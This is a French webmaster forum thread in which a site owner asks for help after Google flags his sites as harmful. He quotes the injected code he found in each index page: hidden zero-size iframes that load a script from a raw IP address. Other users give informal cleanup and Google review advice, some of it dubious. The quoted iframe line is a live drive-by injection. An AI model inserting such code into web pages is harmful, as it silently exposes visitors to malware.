Le meme problème que WRI avec Google
20 messages • Page 1 sur 2 • 1, 2
Consultez la formation au référencement naturel Google de WebRankInfo / Ranking Metrics
- franceradio
- WRInaute passionné

Le meme problème que WRI avec Google
Bonjour,
J'ai réçu plusieurs email de la part de google m'informent que mes sites contiennent un contenu peut endommager les ordinateur, et en cherchant ces sites sur google on tombe sur le meme message qu'il etait sur l'annuaire de WRI:
"This site may harm your computer"
J'etais étonné par tout sa, j'ai verifié les codes de mes sites, et la surprise, j'ai trouver qu'il y a une iframe dans chaque index.php ou index.html comme ceci :
Voilà donc c'est sa qui gène google.
Je me suis documenter sur ce problème, il m'ont dit que c'est une faille en perl, donc mes questions:
- Comment peut on désactiver perl avec Linux ??
- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?
Merci pour votre aide.
J'ai réçu plusieurs email de la part de google m'informent que mes sites contiennent un contenu peut endommager les ordinateur, et en cherchant ces sites sur google on tombe sur le meme message qu'il etait sur l'annuaire de WRI:
"This site may harm your computer"
J'etais étonné par tout sa, j'ai verifié les codes de mes sites, et la surprise, j'ai trouver qu'il y a une iframe dans chaque index.php ou index.html comme ceci :
- Code: Tout sélectionner
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><!-- 1208615770 --><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Voilà donc c'est sa qui gène google.
Je me suis documenter sur ce problème, il m'ont dit que c'est une faille en perl, donc mes questions:
- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?
Merci pour votre aide.
-

mahdivitche - WRInaute passionné

alors ca est un virus (trojan)
si tu supprimer il revient alors pour supprimer ce virus :
couper tous les page de votre site de ftp vers votre poste puis tu supprimer le code de virus
recopie encore votre site en ftp et dans page index.html ( ou php ) tu doit desactive les droit d'ecriture - est les droits d'exectution
( button droit de la souris sur le fichier puis decoche ecriture et execution)
si tu supprimer il revient alors pour supprimer ce virus :
couper tous les page de votre site de ftp vers votre poste puis tu supprimer le code de virus
recopie encore votre site en ftp et dans page index.html ( ou php ) tu doit desactive les droit d'ecriture - est les droits d'exectution
( button droit de la souris sur le fichier puis decoche ecriture et execution)
- franceradio
- WRInaute passionné

merci pour votre réponse, sa c'est déjà fait, je voulais savoir :
-

pour la deuxiem question google detectee automatiqument si il y a un virus ou non mais sa apres la visite de votre site
- franceradio
- WRInaute passionné

merci,
Problème résolu, j'ai trouvé la solution dans un forum en englais, c'est à travers l'outil webmaster de google.
Problème résolu, j'ai trouvé la solution dans un forum en englais, c'est à travers l'outil webmaster de google.
-

franceradio a écrit:merci,
tu peut me donne le solution détaille ???? et merci
franceradio a écrit:- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?
mahdivitche a écrit:tu peut me donne le solution détaille ???? et merci
La personne a déjà répondu à la question :
franceradio a écrit:Problème résolu, [...] c'est à travers l'outil webmaster de google.
Pas trouvé pour désactiver Perl sous Linux.
-

je ne trouve rien dans les outils de webmaseter tools !!!!!
franceradio a écrit:- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?
franceradio a écrit:Problème résolu, [...] c'est à travers l'outil webmaster de google.
mahdivitche a écrit:je ne trouve rien dans les outils de webmaseter tools !!!!!
Voici le lien avec les informations :
http://www.google.com/support/webmaster ... swer=35843
-

merci bqqqqqqqqqqqqqqqq franceradio
-

L.Jee a écrit:Bien que tu sois content ou pressé t'es pas obligé de mettre 10 fois la même lettre ou 10 points d'intérrogation, c'est désagréable et ça ne donne pas franchement envie de t'aider
hiihiihihi
20 messages • Page 1 sur 2 • 1, 2
Formation recommandée sur ce thème :
Formation Référencement naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Mon Compte WRI : les Google Tools de WebRankInfo
- Le vainqueur du design WRI 2005
- Google ferme l'API SOAP aux nouveaux développeurs
- Design de WRI version 3
- Concours Alsa-WRI : changement de design
- Outil commun WebRankInfo + Yagoort
- Quelques nouveautés dans le forum
- Concours de design 2005 de WRI
- Annuaire WRI : c'est la saison des validations !
- Nuage de tags Wordle pour WebRankInfo
- probleme IE et WRI
- Problème de lenteur DE WRI
- Probleme annuaire WRI
- petit problème WRI ?
- Problème serveur / forum wri
- Problème avec le Chat de WRI
- Problème sur la homepage de WRI
- Problème inscription dans l'annuaire WRI
- Annuaire WRI problème pour MAJ
- Petit problème avec l'annuaire de WRI
- Problème sur le fil RSS WRI